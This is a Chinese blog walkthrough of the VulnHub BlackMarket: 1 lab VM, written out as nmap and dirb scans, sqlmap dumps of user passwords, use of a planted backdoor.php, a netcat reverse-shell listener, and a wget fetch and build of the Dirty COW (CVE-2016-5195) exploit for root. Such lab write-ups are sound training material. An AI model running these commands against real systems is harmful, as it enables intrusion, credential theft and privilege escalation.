BlackMarket_ 1靶机渗透

于 2024-10-11 23:06:15 发布
阅读量315 收藏 7
点赞数 10
分类专栏: vulnhub 文章标签: 性能优化 服务器 运维 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67832625/article/details/142865303
版权

在这里插入图片描述

项目地址

```plain https://download.vulnhub.com/blackmarket/BlackMarket.zip ```

实验过程

开启靶机虚拟机

![](https://img-blog.csdnimg.cn/img_convert/169d964d61ea9660c1104e723f71449e.png)

使用nmap进行主机发现,获取靶机IP地址

```plain nmap 192.168.47.1-254 ```

根据对比可知BlackMarket: 1的一个ip地址为192.168.47.174

扫描BlackMarket: 1的操作系统,端口及对应服务

```plain nmap -A -p- 192.168.47.174 ```

发现该靶机开放了21,22,80,110,143,993,995端口

信息收集

浏览器访问80端口,发现是一个登录页面

查看源码发现了第一个flag

base64解码后获得flag

flag1{CIA - Operation Treadstone}

目录扫描

dirb http://192.168.47.174

拼接/squirrelmail/

得到一个登录界面

拼接/supplier/,这个目录会302重定向到Web登录界面

尝试使用目录名字supplier supplier登录,发现登录成功

登陆成功

编辑AK74U时抓包,再使用sqlmap检测是否存在SQL注入,发现存在SQL注入

sqlmap -r sql.txt --dbs --batch
sqlmap -r sql.txt -D BlackMarket --tables --batch
sqlmap -r sql.txt -D BlackMarket -T flag --columns --batch
sqlmap -r sql.txt -D BlackMarket -T flag -C name,FlagId,Information --dump --batch

得到第三个flag

flag3{Find Jason Bourne Email access}

获取user表中的字段

sqlmap -r sql.txt -D BlackMarket -T user --columns --batch
sqlmap -r sql.txt -D BlackMarket -T user -C access,password,username,userid --dump --batch

对各用户密码进行解密:

admin   BigBossCIA
user    user
jbourne 解密失败
bladen  解密失败

使用admin账户登录得到第四个flag

base64解码

flag4{nothing is here}

发现了Jason Bourne 的电子邮件:jbourne@cia.gov

回到小松鼠登录界面

根据flag4的弹窗猜测密码是???

使用账号密码jbourne ???进行登录

登陆成功

点击INBOX.Trash——>IMPORTANT MESSAGE,发现了第五个flag

base64解码

flag5{Everything is encrypted}

此外,还有一段密文:

Sr Wrnrgir
Ru blf ziv ivzwrmt gsrh R nrtsg yv mlg zorev. R szev kozxv z yzxpwlli rm Yozxpnzipvg
dliphslk fmwvi /ptyyzxpwlli ulowvi blf nfhg szev gl
KzhhKzhh.qkt rm liwvi gl szxp rm rg.

看着像置换密码,找个在线网站解密quipqiup - cryptoquip and cryptogram solver

Hi Dimitri If you are reading this I might be not alive. I have place a backdoor in Blackmarket workshop under /kgbbackdoor folder you must have to PassPass.jpg in order to hack in it.

这段话告诉我们/kgbbackdoor目录下留了一个后门,后门是一张叫PassPass.jpg的图片

从数据库着手,发现有一个eworkshop的数据库,利用crunch生成字典进行爆破:

crunch 9 9 -t @workshop > shop.txt
dirb http://192.168.47.174 shop.txt

拼接/vworkshop/kgbbackdoor/PassPass.jpg

将图片保存到本地进行查看

cat PassPass.jpg

得到一个密码5215565757312090656,解密为:HailKGD

先将5215565757312090656转为16进制4861696c4b474400再转为字符串

存在backdoor.php文件,拼接再url后面

http://192.168.47.174/vworkshop/kgbbackdoor/backdoor.php

查看源码

发现有input

添加一个submit

在框内随便输入,回车提交

使用Burp抓包,用POST传pass=HailKGB

放包

成功进入

点击flag.txt得到第六个flag

base64解码

flag6{Root time}

获取shell

kali设置监听 
nc -lvvp 7272

反弹成功

获取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

提权

查看系统内核 
uname -a

发现这个版本可以利用CVE-2016-5195脏牛提权

searchsploit dirt

将exp复制到kali上面来,并开启一个http服务

cp /usr/share/exploitdb/exploits/linux/local/40616.c .
python3 -m http.server

靶机先进入tmp目录然后将exp从kali下载过去

cd /tmp
wget http://192.168.47.129:8000/40616.c
gcc 40616.c -o root -pthread

执行root

./root

提权成功
好小子,离成功又近一步!!!

蚂蚱.top
关注
专栏目录
BlackMarket
03-21
1. Swift基础:变量、常量、函数、类、结构体、枚举、协议等。 2. 类型系统:类型推断、强类型、可选类型、泛型等。 3. 控制流:条件语句、循环、异常处理等。 4. 面向对象编程和协议:继承、多态、委托设计模式等。...
blackMarket-开源
04-14
而"blackMarket-开源"通过提供一个直观的Web界面,使得对proftpd的管理变得更加便捷,用户无需直接通过命令行进行操作,降低了管理难度,提高了工作效率。 接下来,我们关注MySQL。MySQL是一个关系型数据库管理系统...
小白渗透0-1:BlackMarket靶场渗透记录
qq_49399033的博客
07-01 1363
这是一次BlackMarket靶场渗透记录
BlackMarket靶机
m0_61995767的博客
08-10 1043
BlackMarket打靶记录
BlackMarket靶机复现
weixin_52956666的博客
08-07 849
因为squirrelmail是web邮箱应用,存在 CVE-2017-7692 远程代码执行漏洞,但是得有一个用户可以登陆进去。因为 内核版本是4.4.0-31-generic,可以进行脏牛 CVE-2016-5195 提权。并且发现一句话Jason Bourne Email access?抓包,去查看,发现存在id值,这里先尝试改为1,因为大部分高权限用户都是1。尝试squirrelmail,squirrelmail。进入后发现没东西,一点发现有个隐藏的输入框。
渗透测试——BlackMarket
D-R0s1的博客
11-16 2798
第一步:主机发现(找到渗透靶机的ip,使用工具为netdiscover,nmap) 在kali中使用命令安装netdiscover:apt install netdiscover 命令:netdiscover 默认扫描局域网内所有机器,这样的话扫描的是B类地址,所以时间会比较慢。我们也可以直接使用 命令:netdiscover -i eth0 -r 192.168.1.1/24 -i是...
BlackMarket靶机复现【附代码】(权限提升)
weixin_52487093的博客
08-09 2771
web打洞值得挑战!!!全网最详细的BLACKMARKET打靶过程!【少绕弯路!!!】
blackmarket靶机
weixin_73074638的博客
08-10 418
Google搜索 https://bourne.fandom.com/wiki/Operation_Treadstone。访问web服务80端口,发现flag1{Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=}more IMP.txt发现flag2{Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy}尝试弱口令---破解出账号密码supplier:supplier。输入得到的密码得到flag6{Um9vdCB0aW1l}名字为Jbourne,密码为?
vulnhub-BlackMarket 1靶机
wjSteve的博客
09-27 560
DimitryHateApple这个词很唐突,或许是个密码,尝试登录dimitri,首先获得交互式shell。在BlackMarket库下flag表找到第三个flag,然后提示要找到一个邮箱,爆破user表。到这一步我去看了一下WP,似乎这个Flag指向的是一个电影,通过Wiki的资料生成一个字典。登陆需要密码,怀疑flag4哪里的“access”是个同义词,也就是说密码就是?登陆界面,没有能登陆的信息,查看一下元素找到一个flag。既然有邮箱,那么应该就有邮箱登录的地方,扫一下网站目录。
15. CTF综合靶机渗透(八)
weixin_30651273的博客
07-05 521
VM Name: BlackMarket VM Description: BlackMarket VM presented at Brisbane SecTalks BNE0x1B (28th Session) which is focused on students and other InfoSec Professional. This VM has total 6 flag and o...
靶机BlackMarket
qq_43335965的博客
07-27 101
工具:nmap、dirbuster、dirb、sqlmap、cewl、crunch、hydra 涉及的漏洞:弱口令 垂直越权 SQL注入 CVE-2016-5195脏牛提权(内核竞争提权漏洞) flag1 这个靶机有六个flag,五个常规的flag和一个root权限下的flag。 寻找靶机IP地址 nmap -sP 192.168.1.* 发现主机,靶机IP地址192.168.1.9 nmap ...
BlackMarketBlackMarket是在商品过期之前购买商品的商店。 Spigot服务器插件(1.8。*-1.16.2)[Minecraft]
02-20
BlackMarket允许您在一定时间内提供商品,之后,如果没有人购买,则商品将退还给您。 它是完全可定制的。 市场与玩家对象 分类目录 列表显示 全国人大 税收 黑名单 过期时间 定制皮肤 自订讯息 自定义菜单 MySQL或...
Backmarket-WatchDog:监控Blackmarket价格并在购买时发送邮件
04-04
后市场看门狗 监视黑市产品价格,并在购买时发送邮件。 运行脚本: python Backmarket-watchdog/report.py --urls_file "Backmarket-watchdog/example_iphones_to_track.txt" --product_name "iPhone" --subject "...
Redis高并发缓存设计问题与性能优化
人生苦短,及时行乐
10-08 338
缓存设计典型问题
10.10 QT服务器与客户端
qq_73941453的博客
10-10 257
【代码】10.10 QT服务器与客户端。
Linux中的查找操作-ubuntu系统
qq_45993770的博客
10-07 1284
Linux 提供了多种强大的查找工具和方法,适用于不同的查找需求。掌握这些工具的使用,不仅可以提高工作效率,还能帮助你更好地管理和维护系统。查找文件和目录:使用findlocatefd等命令。在文件内容中查找:使用grepripgreprg)、ag等工具。查找进程和打开的文件:使用lsofpspgrep等命令。系统信息查找:使用dfdulsblkblkid等工具。用户和权限信息:使用idwhow等命令。图形化查找工具:如Catfish等。高级查找技巧:结合正则表达式、管道、-exec和。
服务器与内存市场|2025预测动态早知道
最新发布
存储随笔
10-10 835
到2024年第二季度,AWS、Meta、Azure和Google等主要云服务提供商中,DDR5的使用比例分别达到了38%、33%、17%和约45%,其中AWS主要采用的是Graviton处理器,而Meta和Azure则更偏向于AI应用,Google则以Sapphire Rapids为主。根据TrendForce的研究数据,2020年至2024年期间,服务器出货量呈现持续增长趋势,尤其值得注意的是,ODM Direct模式的增长速度超过了整体市场,这主要得益于数据中心和云计算强劲的需求。
常见服务器默认端口+云服务器安全组远程端口以及简单介绍各自作用
m0_66705547的博客
10-05 357
SSH (LINUX) telnet(LINUX、windows) RDP(windows) 远程连接服务器。Oracle甲骨文数据库(关系型)(linux、windows)HTTP HTTPS 超文本协议,web服务器需要的网络端口。PostgreSQL关系型数据库,大多数国产数据库的模板。MSSQL SQLServer数据库(windows)Mogodb 文档型数据库。Mysql 关系型数据库。Redis 键值对数据库。
【华为欧拉】国产OpenEuler服务器系统安装以及图形界面
北京土豆(qqxinxi) 的专栏
10-10 553
复制到光盘,光盘引导安装。虚拟机安装,准备好iso文件引用,指定好安装源,安装界面和cent,DDE 由中国的 Deepin 团队开发,旨在提供一个现代化、美观和易用的桌面环境。安装,复制到光盘,光盘引导安装。虚拟机安装,准备好iso文件引用,指定好安装源,安装界面和centOS基本一样。选择最小安装就可以,其他都可以后装。建议UKUI:UKUI 是由中国的 Ubuntu Kylin 团队开发的,旨在为中国用户提供一个本地化的、友好的桌面环境。下一步就行,选择默认分区,选择root帐号,输入密码并保存密码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值